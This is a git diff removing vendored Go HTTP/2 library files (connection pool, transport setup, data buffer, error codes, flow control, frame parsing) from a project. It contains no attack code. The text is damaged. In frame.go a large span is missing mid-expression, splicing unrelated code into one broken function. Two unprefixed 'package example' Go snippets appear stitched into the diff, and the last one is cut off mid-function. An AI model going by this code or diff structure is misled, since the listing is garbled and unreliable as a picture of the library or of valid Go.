cipher_TLS_DH_anon_WITH_ARIA_128_GCM_SHA256, - cipher_TLS_DH_anon_WITH_ARIA_256_GCM_SHA384, - cipher_TLS_ECDH_ECDSA_WITH_ARIA_128_GCM_SHA256, - cipher_TLS_ECDH_ECDSA_WITH_ARIA_256_GCM_SHA384, - cipher_TLS_ECDH_RSA_WITH_ARIA_128_GCM_SHA256, - cipher_TLS_ECDH_RSA_WITH_ARIA_256_GCM_SHA384, - cipher_TLS_PSK_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_PSK_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_DHE_PSK_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_DHE_PSK_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_RSA_PSK_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_RSA_PSK_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_PSK_WITH_ARIA_128_GCM_SHA256, - cipher_TLS_PSK_WITH_ARIA_256_GCM_SHA384, - cipher_TLS_RSA_PSK_WITH_ARIA_128_GCM_SHA256, - cipher_TLS_RSA_PSK_WITH_ARIA_256_GCM_SHA384, - cipher_TLS_ECDHE_PSK_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_ECDHE_PSK_WITH_ARIA_256_CBC_SHA384, - 
cipher_TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_CBC_SHA384, - cipher_TLS_ECDH_ECDSA_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_ECDH_ECDSA_WITH_CAMELLIA_256_CBC_SHA384, - cipher_TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384, - cipher_TLS_ECDH_RSA_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_ECDH_RSA_WITH_CAMELLIA_256_CBC_SHA384, - cipher_TLS_RSA_WITH_CAMELLIA_128_GCM_SHA256, - cipher_TLS_RSA_WITH_CAMELLIA_256_GCM_SHA384, - cipher_TLS_DH_RSA_WITH_CAMELLIA_128_GCM_SHA256, - cipher_TLS_DH_RSA_WITH_CAMELLIA_256_GCM_SHA384, - cipher_TLS_DH_DSS_WITH_CAMELLIA_128_GCM_SHA256, - cipher_TLS_DH_DSS_WITH_CAMELLIA_256_GCM_SHA384, - cipher_TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256, - cipher_TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384, - cipher_TLS_ECDH_ECDSA_WITH_CAMELLIA_128_GCM_SHA256, - cipher_TLS_ECDH_ECDSA_WITH_CAMELLIA_256_GCM_SHA384, - cipher_TLS_ECDH_RSA_WITH_CAMELLIA_128_GCM_SHA256, - cipher_TLS_ECDH_RSA_WITH_CAMELLIA_256_GCM_SHA384, - cipher_TLS_PSK_WITH_CAMELLIA_128_GCM_SHA256, - cipher_TLS_PSK_WITH_CAMELLIA_256_GCM_SHA384, - cipher_TLS_RSA_PSK_WITH_CAMELLIA_128_GCM_SHA256, - cipher_TLS_RSA_PSK_WITH_CAMELLIA_256_GCM_SHA384, - cipher_TLS_PSK_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_PSK_WITH_CAMELLIA_256_CBC_SHA384, - cipher_TLS_DHE_PSK_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_DHE_PSK_WITH_CAMELLIA_256_CBC_SHA384, - cipher_TLS_RSA_PSK_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_RSA_PSK_WITH_CAMELLIA_256_CBC_SHA384, - cipher_TLS_ECDHE_PSK_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_ECDHE_PSK_WITH_CAMELLIA_256_CBC_SHA384, - cipher_TLS_RSA_WITH_AES_128_CCM, - cipher_TLS_RSA_WITH_AES_256_CCM, - cipher_TLS_RSA_WITH_AES_128_CCM_8, - cipher_TLS_RSA_WITH_AES_256_CCM_8, - cipher_TLS_PSK_WITH_AES_128_CCM, - cipher_TLS_PSK_WITH_AES_256_CCM, - cipher_TLS_PSK_WITH_AES_128_CCM_8, - cipher_TLS_PSK_WITH_AES_256_CCM_8: - return true - default: - return false - } -} diff --git a/vendor/golang.org/x/net/http2/client_conn_pool.go b/vendor/golang.org/x/net/http2/client_conn_pool.go deleted file mode 100644 index bdf5652b..00000000 --- a/vendor/golang.org/x/net/http2/client_conn_pool.go +++ /dev/null @@ -1,256 +0,0 @@ -// Copyright 2015 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// Transport code's client connection pooling. - -package http2 - -import ( - "crypto/tls" - "net/http" - "sync" -) - -// ClientConnPool manages a pool of HTTP/2 client connections. -type ClientConnPool interface { - GetClientConn(req *http.Request, addr string) (*ClientConn, error) - MarkDead(*ClientConn) -} - -// clientConnPoolIdleCloser is the interface implemented by ClientConnPool -// implementations which can close their idle connections. -type clientConnPoolIdleCloser interface { - ClientConnPool - closeIdleConnections() -} - -var ( - _ clientConnPoolIdleCloser = (*clientConnPool)(nil) - _ clientConnPoolIdleCloser = noDialClientConnPool{} -) - -// TODO: use singleflight for dialing and addConnCalls? -type clientConnPool struct { - t *Transport - - mu sync.Mutex // TODO: maybe switch to RWMutex - // TODO: add support for sharing conns based on cert names - // (e.g. 
share conn for googleapis.com and appspot.com) - conns map[string][]*ClientConn // key is host:port - dialing map[string]*dialCall // currently in-flight dials - keys map[*ClientConn][]string - addConnCalls map[string]*addConnCall // in-flight addConnIfNeede calls -} - -func (p *clientConnPool) GetClientConn(req *http.Request, addr string) (*ClientConn, error) { - return p.getClientConn(req, addr, dialOnMiss) -} - -const ( - dialOnMiss = true - noDialOnMiss = false -) - -func (p *clientConnPool) getClientConn(req *http.Request, addr string, dialOnMiss bool) (*ClientConn, error) { - if isConnectionCloseRequest(req) && dialOnMiss { - // It gets its own connection. - const singleUse = true - cc, err := p.t.dialClientConn(addr, singleUse) - if err != nil { - return nil, err - } - return cc, nil - } - p.mu.Lock() - for _, cc := range p.conns[addr] { - if cc.CanTakeNewRequest() { - p.mu.Unlock() - return cc, nil - } - } - if !dialOnMiss { - p.mu.Unlock() - return nil, ErrNoCachedConn - } - call := p.getStartDialLocked(addr) - p.mu.Unlock() - <-call.done - return call.res, call.err -} - -// dialCall is an in-flight Transport dial call to a host. -type dialCall struct { - p *clientConnPool - done chan struct{} // closed when done - res *ClientConn // valid after done is closed - err error // valid after done is closed -} - -// requires p.mu is held. -func (p *clientConnPool) getStartDialLocked(addr string) *dialCall { - if call, ok := p.dialing[addr]; ok { - // A dial is already in-flight. Don't start another. - return call - } - call := &dialCall{p: p, done: make(chan struct{})} - if p.dialing == nil { - p.dialing = make(map[string]*dialCall) - } - p.dialing[addr] = call - go call.dial(addr) - return call -} - -// run in its own goroutine. -func (c *dialCall) dial(addr string) { - const singleUse = false // shared conn - c.res, c.err = c.p.t.dialClientConn(addr, singleUse) - close(c.done) - - c.p.mu.Lock() - delete(c.p.dialing, addr) - if c.err == nil { - c.p.addConnLocked(addr, c.res) - } - c.p.mu.Unlock() -} - -// addConnIfNeeded makes a NewClientConn out of c if a connection for key doesn't -// already exist. It coalesces concurrent calls with the same key. -// This is used by the http1 Transport code when it creates a new connection. Because -// the http1 Transport doesn't de-dup TCP dials to outbound hosts (because it doesn't know -// the protocol), it can get into a situation where it has multiple TLS connections. -// This code decides which ones live or die. -// The return value used is whether c was used. -// c is never closed. 
-func (p *clientConnPool) addConnIfNeeded(key string, t *Transport, c *tls.Conn) (used bool, err error) { - p.mu.Lock() - for _, cc := range p.conns[key] { - if cc.CanTakeNewRequest() { - p.mu.Unlock() - return false, nil - } - } - call, dup := p.addConnCalls[key] - if !dup { - if p.addConnCalls == nil { - p.addConnCalls = make(map[string]*addConnCall) - } - call = &addConnCall{ - p: p, - done: make(chan struct{}), - } - p.addConnCalls[key] = call - go call.run(t, key, c) - } - p.mu.Unlock() - - <-call.done - if call.err != nil { - return false, call.err - } - return !dup, nil -} - -type addConnCall struct { - p *clientConnPool - done chan struct{} // closed when done - err error -} - -func (c *addConnCall) run(t *Transport, key string, tc *tls.Conn) { - cc, err := t.NewClientConn(tc) - - p := c.p - p.mu.Lock() - if err != nil { - c.err = err - } else { - p.addConnLocked(key, cc) - } - delete(p.addConnCalls, key) - p.mu.Unlock() - close(c.done) -} - -func (p *clientConnPool) addConn(key string, cc *ClientConn) { - p.mu.Lock() - p.addConnLocked(key, cc) - p.mu.Unlock() -} - -// p.mu must be held -func (p *clientConnPool) addConnLocked(key string, cc *ClientConn) { - for _, v := range p.conns[key] { - if v == cc { - return - } - } - if p.conns == nil { - p.conns = make(map[string][]*ClientConn) - } - if p.keys == nil { - p.keys = make(map[*ClientConn][]string) - } - p.conns[key] = append(p.conns[key], cc) - p.keys[cc] = append(p.keys[cc], key) -} - -func (p *clientConnPool) MarkDead(cc *ClientConn) { - p.mu.Lock() - defer p.mu.Unlock() - for _, key := range p.keys[cc] { - vv, ok := p.conns[key] - if !ok { - continue - } - newList := filterOutClientConn(vv, cc) - if len(newList) > 0 { - p.conns[key] = newList - } else { - delete(p.conns, key) - } - } - delete(p.keys, cc) -} - -func (p *clientConnPool) closeIdleConnections() { - p.mu.Lock() - defer p.mu.Unlock() - // TODO: don't close a cc if it was just added to the pool - // milliseconds ago and has never been used. There's currently - // a small race window with the HTTP/1 Transport's integration - // where it can add an idle conn just before using it, and - // somebody else can concurrently call CloseIdleConns and - // break some caller's RoundTrip. - for _, vv := range p.conns { - for _, cc := range vv { - cc.closeIfIdle() - } - } -} - -func filterOutClientConn(in []*ClientConn, exclude *ClientConn) []*ClientConn { - out := in[:0] - for _, v := range in { - if v != exclude { - out = append(out, v) - } - } - // If we filtered it out, zero out the last item to prevent - // the GC from seeing it. - if len(in) != len(out) { - in[len(in)-1] = nil - } - return out -} - -// noDialClientConnPool is an implementation of http2.ClientConnPool -// which never dials. We let the HTTP/1.1 client dial and use its TLS -// connection instead. -type noDialClientConnPool struct{ *clientConnPool } - -func (p noDialClientConnPool) GetClientConn(req *http.Request, addr string) (*ClientConn, error) { - return p.getClientConn(req, addr, noDialOnMiss) -} diff --git a/vendor/golang.org/x/net/http2/configure_transport.go b/vendor/golang.org/x/net/http2/configure_transport.go deleted file mode 100644 index b65fc6d4..00000000 --- a/vendor/golang.org/x/net/http2/configure_transport.go +++ /dev/null @@ -1,80 +0,0 @@ -// Copyright 2015 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. 
- -// +build go1.6 - -package http2 - -import ( - "crypto/tls" - "fmt" - "net/http" -) - -func configureTransport(t1 *http.Transport) (*Transport, error) { - connPool := new(clientConnPool) - t2 := &Transport{ - ConnPool: noDialClientConnPool{connPool}, - t1: t1, - } - connPool.t = t2 - if err := registerHTTPSProtocol(t1, noDialH2RoundTripper{t2}); err != nil { - return nil, err - } - if t1.TLSClientConfig == nil { - t1.TLSClientConfig = new(tls.Config) - } - if !strSliceContains(t1.TLSClientConfig.NextProtos, "h2") { - t1.TLSClientConfig.NextProtos = append([]string{"h2"}, t1.TLSClientConfig.NextProtos...) - } - if !strSliceContains(t1.TLSClientConfig.NextProtos, "http/1.1") { - t1.TLSClientConfig.NextProtos = append(t1.TLSClientConfig.NextProtos, "http/1.1") - } - upgradeFn := func(authority string, c *tls.Conn) http.RoundTripper { - addr := authorityAddr("https", authority) - if used, err := connPool.addConnIfNeeded(addr, t2, c); err != nil { - go c.Close() - return erringRoundTripper{err} - } else if !used { - // Turns out we don't need this c. - // For example, two goroutines made requests to the same host - // at the same time, both kicking off TCP dials. (since protocol - // was unknown) - go c.Close() - } - return t2 - } - if m := t1.TLSNextProto; len(m) == 0 { - t1.TLSNextProto = map[string]func(string, *tls.Conn) http.RoundTripper{ - "h2": upgradeFn, - } - } else { - m["h2"] = upgradeFn - } - return t2, nil -} - -// registerHTTPSProtocol calls Transport.RegisterProtocol but -// converting panics into errors. -func registerHTTPSProtocol(t *http.Transport, rt http.RoundTripper) (err error) { - defer func() { - if e := recover(); e != nil { - err = fmt.Errorf("%v", e) - } - }() - t.RegisterProtocol("https", rt) - return nil -} - -// noDialH2RoundTripper is a RoundTripper which only tries to complete the request -// if there's already has a cached connection to the host. -type noDialH2RoundTripper struct{ t *Transport } - -func (rt noDialH2RoundTripper) RoundTrip(req *http.Request) (*http.Response, error) { - res, err := rt.t.RoundTrip(req) - if err == ErrNoCachedConn { - return nil, http.ErrSkipAltProtocol - } - return res, err -} diff --git a/vendor/golang.org/x/net/http2/databuffer.go b/vendor/golang.org/x/net/http2/databuffer.go deleted file mode 100644 index a3067f8d..00000000 --- a/vendor/golang.org/x/net/http2/databuffer.go +++ /dev/null @@ -1,146 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -package http2 - -import ( - "errors" - "fmt" - "sync" -) - -// Buffer chunks are allocated from a pool to reduce pressure on GC. -// The maximum wasted space per dataBuffer is 2x the largest size class, -// which happens when the dataBuffer has multiple chunks and there is -// one unread byte in both the first and last chunks. We use a few size -// classes to minimize overheads for servers that typically receive very -// small request bodies. -// -// TODO: Benchmark to determine if the pools are necessary. 
The GC may have -// improved enough that we can instead allocate chunks like this: -// make([]byte, max(16<<10, expectedBytesRemaining)) -var ( - dataChunkSizeClasses = []int{ - 1 << 10, - 2 << 10, - 4 << 10, - 8 << 10, - 16 << 10, - } - dataChunkPools = [...]sync.Pool{ - {New: func() interface{} { return make([]byte, 1<<10) }}, - {New: func() interface{} { return make([]byte, 2<<10) }}, - {New: func() interface{} { return make([]byte, 4<<10) }}, - {New: func() interface{} { return make([]byte, 8<<10) }}, - {New: func() interface{} { return make([]byte, 16<<10) }}, - } -) - -func getDataBufferChunk(size int64) []byte { - i := 0 - for ; i < len(dataChunkSizeClasses)-1; i++ { - if size <= int64(dataChunkSizeClasses[i]) { - break - } - } - return dataChunkPools[i].Get().([]byte) -} - -func putDataBufferChunk(p []byte) { - for i, n := range dataChunkSizeClasses { - if len(p) == n { - dataChunkPools[i].Put(p) - return - } - } - panic(fmt.Sprintf("unexpected buffer len=%v", len(p))) -} - -// dataBuffer is an io.ReadWriter backed by a list of data chunks. -// Each dataBuffer is used to read DATA frames on a single stream. -// The buffer is divided into chunks so the server can limit the -// total memory used by a single connection without limiting the -// request body size on any single stream. -type dataBuffer struct { - chunks [][]byte - r int // next byte to read is chunks[0][r] - w int // next byte to write is chunks[len(chunks)-1][w] - size int // total buffered bytes - expected int64 // we expect at least this many bytes in future Write calls (ignored if <= 0) -} - -var errReadEmpty = errors.New("read from empty dataBuffer") - -// Read copies bytes from the buffer into p. -// It is an error to read when no data is available. -func (b *dataBuffer) Read(p []byte) (int, error) { - if b.size == 0 { - return 0, errReadEmpty - } - var ntotal int - for len(p) > 0 && b.size > 0 { - readFrom := b.bytesFromFirstChunk() - n := copy(p, readFrom) - p = p[n:] - ntotal += n - b.r += n - b.size -= n - // If the first chunk has been consumed, advance to the next chunk. - if b.r == len(b.chunks[0]) { - putDataBufferChunk(b.chunks[0]) - end := len(b.chunks) - 1 - copy(b.chunks[:end], b.chunks[1:]) - b.chunks[end] = nil - b.chunks = b.chunks[:end] - b.r = 0 - } - } - return ntotal, nil -} - -func (b *dataBuffer) bytesFromFirstChunk() []byte { - if len(b.chunks) == 1 { - return b.chunks[0][b.r:b.w] - } - return b.chunks[0][b.r:] -} - -// Len returns the number of bytes of the unread portion of the buffer. -func (b *dataBuffer) Len() int { - return b.size -} - -// Write appends p to the buffer. -func (b *dataBuffer) Write(p []byte) (int, error) { - ntotal := len(p) - for len(p) > 0 { - // If the last chunk is empty, allocate a new chunk. Try to allocate - // enough to fully copy p plus any additional bytes we expect to - // receive. However, this may allocate less than len(p). 
- want := int64(len(p)) - if b.expected > want { - want = b.expected - } - chunk := b.lastChunkOrAlloc(want) - n := copy(chunk[b.w:], p) - p = p[n:] - b.w += n - b.size += n - b.expected -= int64(n) - } - return ntotal, nil -} - -func (b *dataBuffer) lastChunkOrAlloc(want int64) []byte { - if len(b.chunks) != 0 { - last := b.chunks[len(b.chunks)-1] - if b.w < len(last) { - return last - } - } - chunk := getDataBufferChunk(want) - b.chunks = append(b.chunks, chunk) - b.w = 0 - return chunk -} diff --git a/vendor/golang.org/x/net/http2/errors.go b/vendor/golang.org/x/net/http2/errors.go deleted file mode 100644 index 71f2c463..00000000 --- a/vendor/golang.org/x/net/http2/errors.go +++ /dev/null @@ -1,133 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -package http2 - -import ( - "errors" - "fmt" -) - -// An ErrCode is an unsigned 32-bit error code as defined in the HTTP/2 spec. -type ErrCode uint32 - -const ( - ErrCodeNo ErrCode = 0x0 - ErrCodeProtocol ErrCode = 0x1 - ErrCodeInternal ErrCode = 0x2 - ErrCodeFlowControl ErrCode = 0x3 - ErrCodeSettingsTimeout ErrCode = 0x4 - ErrCodeStreamClosed ErrCode = 0x5 - ErrCodeFrameSize ErrCode = 0x6 - ErrCodeRefusedStream ErrCode = 0x7 - ErrCodeCancel ErrCode = 0x8 - ErrCodeCompression ErrCode = 0x9 - ErrCodeConnect ErrCode = 0xa - ErrCodeEnhanceYourCalm ErrCode = 0xb - ErrCodeInadequateSecurity ErrCode = 0xc - ErrCodeHTTP11Required ErrCode = 0xd -) - -var errCodeName = map[ErrCode]string{ - ErrCodeNo: "NO_ERROR", - ErrCodeProtocol: "PROTOCOL_ERROR", - ErrCodeInternal: "INTERNAL_ERROR", - ErrCodeFlowControl: "FLOW_CONTROL_ERROR", - ErrCodeSettingsTimeout: "SETTINGS_TIMEOUT", - ErrCodeStreamClosed: "STREAM_CLOSED", - ErrCodeFrameSize: "FRAME_SIZE_ERROR", - ErrCodeRefusedStream: "REFUSED_STREAM", - ErrCodeCancel: "CANCEL", - ErrCodeCompression: "COMPRESSION_ERROR", - ErrCodeConnect: "CONNECT_ERROR", - ErrCodeEnhanceYourCalm: "ENHANCE_YOUR_CALM", - ErrCodeInadequateSecurity: "INADEQUATE_SECURITY", - ErrCodeHTTP11Required: "HTTP_1_1_REQUIRED", -} - -func (e ErrCode) String() string { - if s, ok := errCodeName[e]; ok { - return s - } - return fmt.Sprintf("unknown error code 0x%x", uint32(e)) -} - -// ConnectionError is an error that results in the termination of the -// entire connection. -type ConnectionError ErrCode - -func (e ConnectionError) Error() string { return fmt.Sprintf("connection error: %s", ErrCode(e)) } - -// StreamError is an error that only affects one stream within an -// HTTP/2 connection. -type StreamError struct { - StreamID uint32 - Code ErrCode - Cause error // optional additional detail -} - -func streamError(id uint32, code ErrCode) StreamError { - return StreamError{StreamID: id, Code: code} -} - -func (e StreamError) Error() string { - if e.Cause != nil { - return fmt.Sprintf("stream error: stream ID %d; %v; %v", e.StreamID, e.Code, e.Cause) - } - return fmt.Sprintf("stream error: stream ID %d; %v", e.StreamID, e.Code) -} - -// 6.9.1 The Flow Control Window -// "If a sender receives a WINDOW_UPDATE that causes a flow control -// window to exceed this maximum it MUST terminate either the stream -// or the connection, as appropriate. For streams, [...]; for the -// connection, a GOAWAY frame with a FLOW_CONTROL_ERROR code." 
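// A minimal assumed sketch (not taken from the vendored file above) of how callers
// usually tell apart the two error kinds defined above: a StreamError only dooms one
// stream, while anything else returned by ReadFrame (e.g. a ConnectionError) is fatal
// for the whole connection. The package name "example" and the parameter "fr" are
// placeholders for illustration only.
package example

import (
	"log"

	"golang.org/x/net/http2"
)

func readLoop(fr *http2.Framer) {
	for {
		_, err := fr.ReadFrame()
		switch e := err.(type) {
		case nil:
			continue
		case http2.StreamError:
			// Only this one stream is broken; the connection keeps going.
			log.Printf("resetting stream %d: %v", e.StreamID, e)
		default:
			// Anything else, such as http2.ConnectionError, ends the connection.
			log.Printf("closing connection: %v", e)
			return
		}
	}
}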
-type goAwayFlowError struct{} - -func (goAwayFlowError) Error() string { return "connection exceeded flow control window size" } - -// connError represents an HTTP/2 ConnectionError error code, along -// with a string (for debugging) explaining why. -// -// Errors of this type are only returned by the frame parser functions -// and converted into ConnectionError(Code), after stashing away -// the Reason into the Framer's errDetail field, accessible via -// the (*Framer).ErrorDetail method. -type connError struct { - Code ErrCode // the ConnectionError error code - Reason string // additional reason -} - -func (e connError) Error() string { - return fmt.Sprintf("http2: connection error: %v: %v", e.Code, e.Reason) -} - -type pseudoHeaderError string - -func (e pseudoHeaderError) Error() string { - return fmt.Sprintf("invalid pseudo-header %q", string(e)) -} - -type duplicatePseudoHeaderError string - -func (e duplicatePseudoHeaderError) Error() string { - return fmt.Sprintf("duplicate pseudo-header %q", string(e)) -} - -type headerFieldNameError string - -func (e headerFieldNameError) Error() string { - return fmt.Sprintf("invalid header field name %q", string(e)) -} - -type headerFieldValueError string - -func (e headerFieldValueError) Error() string { - return fmt.Sprintf("invalid header field value %q", string(e)) -} - -var ( - errMixPseudoHeaderTypes = errors.New("mix of request and response pseudo headers") - errPseudoAfterRegular = errors.New("pseudo header field after regular") -) diff --git a/vendor/golang.org/x/net/http2/flow.go b/vendor/golang.org/x/net/http2/flow.go deleted file mode 100644 index 957de254..00000000 --- a/vendor/golang.org/x/net/http2/flow.go +++ /dev/null @@ -1,50 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// Flow control - -package http2 - -// flow is the flow control window's size. -type flow struct { - // n is the number of DATA bytes we're allowed to send. - // A flow is kept both on a conn and a per-stream. - n int32 - - // conn points to the shared connection-level flow that is - // shared by all streams on that conn. It is nil for the flow - // that's on the conn directly. - conn *flow -} - -func (f *flow) setConnFlow(cf *flow) { f.conn = cf } - -func (f *flow) available() int32 { - n := f.n - if f.conn != nil && f.conn.n < n { - n = f.conn.n - } - return n -} - -func (f *flow) take(n int32) { - if n > f.available() { - panic("internal error: took too much") - } - f.n -= n - if f.conn != nil { - f.conn.n -= n - } -} - -// add adds n bytes (positive or negative) to the flow control window. -// It returns false if the sum would exceed 2^31-1. -func (f *flow) add(n int32) bool { - remain := (1<<31 - 1) - f.n - if n > remain { - return false - } - f.n += n - return true -} diff --git a/vendor/golang.org/x/net/http2/frame.go b/vendor/golang.org/x/net/http2/frame.go deleted file mode 100644 index 3b148907..00000000 --- a/vendor/golang.org/x/net/http2/frame.go +++ /dev/null @@ -1,1579 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. 
- -package http2 - -import ( - "bytes" - "encoding/binary" - "errors" - "fmt" - "io" - "log" - "strings" - "sync" - - "golang.org/x/net/http2/hpack" - "golang.org/x/net/lex/httplex" -) - -const frameHeaderLen = 9 - -var padZeros = make([]byte, 255) // zeros for padding - -// A FrameType is a registered frame type as defined in -// http://http2.github.io/http2-spec/#rfc.section.11.2 -type FrameType uint8 - -const ( - FrameData FrameType = 0x0 - FrameHeaders FrameType = 0x1 - FramePriority FrameType = 0x2 - FrameRSTStream FrameType = 0x3 - FrameSettings FrameType = 0x4 - FramePushPromise FrameType = 0x5 - FramePing FrameType = 0x6 - FrameGoAway FrameType = 0x7 - FrameWindowUpdate FrameType = 0x8 - FrameContinuation FrameType = 0x9 -) - -var frameName = map[FrameType]string{ - FrameData: "DATA", - FrameHeaders: "HEADERS", - FramePriority: "PRIORITY", - FrameRSTStream: "RST_STREAM", - FrameSettings: "SETTINGS", - FramePushPromise: "PUSH_PROMISE", - FramePing: "PING", - FrameGoAway: "GOAWAY", - FrameWindowUpdate: "WINDOW_UPDATE", - FrameContinuation: "CONTINUATION", -} - -func (t FrameType) String() string { - if s, ok := frameName[t]; ok { - return s - } - return fmt.Sprintf("UNKNOWN_FRAME_TYPE_%d", uint8(t)) -} - -// Flags is a bitmask of HTTP/2 flags. -// The meaning of flags varies depending on the frame type. -type Flags uint8 - -// Has reports whether f contains all (0 or more) flags in v. -func (f Flags) Has(v Flags) bool { - return (f & v) == v -} - -// Frame-specific FrameHeader flag bits. -const ( - // Data Frame - FlagDataEndStream Flags = 0x1 - FlagDataPadded Flags = 0x8 - - // Headers Frame - FlagHeadersEndStream Flags = 0x1 - FlagHeadersEndHeaders Flags = 0x4 - FlagHeadersPadded Flags = 0x8 - FlagHeadersPriority Flags = 0x20 - - // Settings Frame - FlagSettingsAck Flags = 0x1 - - // Ping Frame - FlagPingAck Flags = 0x1 - - // Continuation Frame - FlagContinuationEndHeaders Flags = 0x4 - - FlagPushPromiseEndHeaders Flags = 0x4 - FlagPushPromisePadded Flags = 0x8 -) - -var flagName = map[FrameType]map[Flags]string{ - FrameData: { - FlagDataEndStream: "END_STREAM", - FlagDataPadded: "PADDED", - }, - FrameHeaders: { - FlagHeadersEndStream: "END_STREAM", - FlagHeadersEndHeaders: "END_HEADERS", - FlagHeadersPadded: "PADDED", - FlagHeadersPriority: "PRIORITY", - }, - FrameSettings: { - FlagSettingsAck: "ACK", - }, - FramePing: { - FlagPingAck: "ACK", - }, - FrameContinuation: { - FlagContinuationEndHeaders: "END_HEADERS", - }, - FramePushPromise: { - FlagPushPromiseEndHeaders: "END_HEADERS", - FlagPushPromisePadded: "PADDED", - }, -} - -// a frameParser parses a frame given its FrameHeader and payload -// bytes. The length of payload will always equal fh.Length (which -// might be 0). -type frameParser func(fc *frameCache, fh FrameHeader, payload []byte) (Frame, error) - -var frameParsers = map[FrameType]frameParser{ - FrameData: parseDataFrame, - FrameHeaders: parseHeadersFrame, - FramePriority: parsePriorityFrame, - FrameRSTStream: parseRSTStreamFrame, - FrameSettings: parseSettingsFrame, - FramePushPromise: parsePushPromise, - FramePing: parsePingFrame, - FrameGoAway: parseGoAwayFrame, - FrameWindowUpdate: parseWindowUpdateFrame, - FrameContinuation: parseContinuationFrame, -} - -func typeFrameParser(t FrameType) frameParser { - if f := frameParsers[t]; f != nil { - return f - } - return parseUnknownFrame -} - -// A FrameHeader is the 9 byte header of all HTTP/2 frames. 
-// -// See http://http2.github.io/http2-spec/#FrameHeader -type FrameHeader struct { - valid bool // caller can access []byte fields in the Frame - - // Type is the 1 byte frame type. There are ten standard frame - // types, but extension frame types may be written by WriteRawFrame - // and will be returned by ReadFrame (as UnknownFrame). - Type FrameType - - // Flags are the 1 byte of 8 potential bit flags per frame. - // They are specific to the frame type. - Flags Flags - - // Length is the length of the frame, not including the 9 byte header. - // The maximum size is one byte less than 16MB (uint24), but only - // frames up to 16KB are allowed without peer agreement. - Length uint32 - - // StreamID is which stream this frame is for. Certain frames - // are not stream-specific, in which case this field is 0. - StreamID uint32 -} - -// Header returns h. It exists so FrameHeaders can be embedded in other -// specific frame types and implement the Frame interface. -func (h FrameHeader) Header() FrameHeader { return h } - -func (h FrameHeader) String() string { - var buf bytes.Buffer - buf.WriteString("[FrameHeader ") - h.writeDebug(&buf) - buf.WriteByte(']') - return buf.String() -} - -func (h FrameHeader) writeDebug(buf *bytes.Buffer) { - buf.WriteString(h.Type.String()) - if h.Flags != 0 { - buf.WriteString(" flags=") - set := 0 - for i := uint8(0); i < 8; i++ { - if h.Flags&(1< 1 { - buf.WriteByte('|') - } - name := flagName[h.Type][Flags(1<>24), - byte(streamID>>16), - byte(streamID>>8), - byte(streamID)) -} - -func (f *Framer) endWrite() error { - // Now that we know the final size, fill in the FrameHeader in - // the space previously reserved for it. Abuse append. - length := len(f.wbuf) - frameHeaderLen - if length >= (1 << 24) { - return ErrFrameTooLarge - } - _ = append(f.wbuf[:0], - byte(length>>16), - byte(length>>8), - byte(length)) - if f.logWrites { - f.logWrite() - } - - n, err := f.w.Write(f.wbuf) - if err == nil && n != len(f.wbuf) { - err = io.ErrShortWrite - } - return err -} - -func (f *Framer) logWrite() { - if f.debugFramer == nil { - f.debugFramerBuf = new(bytes.Buffer) - f.debugFramer = NewFramer(nil, f.debugFramerBuf) - f.debugFramer.logReads = false // we log it ourselves, saying "wrote" below - // Let us read anything, even if we accidentally wrote it - // in the wrong order: - f.debugFramer.AllowIllegalReads = true - } - f.debugFramerBuf.Write(f.wbuf) - fr, err := f.debugFramer.ReadFrame() - if err != nil { - f.debugWriteLoggerf("http2: Framer %p: failed to decode just-written frame", f) - return - } - f.debugWriteLoggerf("http2: Framer %p: wrote %v", f, summarizeFrame(fr)) -} - -func (f *Framer) writeByte(v byte) { f.wbuf = append(f.wbuf, v) } -func (f *Framer) writeBytes(v []byte) { f.wbuf = append(f.wbuf, v...) } -func (f *Framer) writeUint16(v uint16) { f.wbuf = append(f.wbuf, byte(v>>8), byte(v)) } -func (f *Framer) writeUint32(v uint32) { - f.wbuf = append(f.wbuf, byte(v>>24), byte(v>>16), byte(v>>8), byte(v)) -} - -const ( - minMaxFrameSize = 1 << 14 - maxFrameSize = 1<<24 - 1 -) - -// SetReuseFrames allows the Framer to reuse Frames. -// If called on a Framer, Frames returned by calls to ReadFrame are only -// valid until the next call to ReadFrame. 
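// A minimal assumed sketch (not part of the vendored file being removed) of the reuse
// contract documented above: after SetReuseFrames, anything returned by ReadFrame must
// be copied if it has to outlive the next read. "conn" stands in for any io.ReadWriter,
// such as a net.Conn; the package name "example" is a placeholder.
package example

import (
	"io"
	"log"

	"golang.org/x/net/http2"
)

func readFrames(conn io.ReadWriter) {
	fr := http2.NewFramer(conn, conn) // frames are written to and read from conn
	fr.SetReuseFrames()               // returned Frames now live only until the next ReadFrame
	for {
		f, err := fr.ReadFrame()
		if err != nil {
			log.Printf("read loop ended: %v", err)
			return
		}
		if df, ok := f.(*http2.DataFrame); ok {
			// Per the contract above, copy Data() before the next ReadFrame invalidates it.
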